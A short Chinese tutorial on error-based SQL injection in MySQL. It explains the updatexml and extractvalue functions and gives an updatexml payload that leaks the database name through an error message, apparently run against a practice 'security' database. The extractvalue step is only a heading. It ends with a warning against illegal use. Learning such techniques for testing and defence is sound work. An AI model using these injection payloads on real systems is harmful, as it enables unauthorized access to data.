24、显错注入(updatexml和extractvalue)

首先介绍两个函数

UPDATEXML (XML_document, XPath_string, new_value);

第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc

第二个参数：XPath_string (Xpath格式的字符串) ，如果不了解Xpath语法，可以在网上查找教程。

第三个参数：new_value，String格式，替换查找到的符合条件的数据

EXTRACTVALUE (XML_document, XPath_string);

第一个参数：XML_document是String格式，为XML文档对象的名称，文中为Doc

第二个参数：XPath_string (Xpath格式的字符串)

一、查询数据库名称

show databases;

二、选择数据库security

use security;

三、显示数据库中的表

show tables;

四、查询users表中数据

select * from users;

五、用函数updatexml注入，获取数据库名称

mysql> select * from users where id=1 and updatexml(2,concat(0x3D,database(),0x3

D),2);

六、用函数extractvalue注入，获取当前用户

禁止非法，后果自负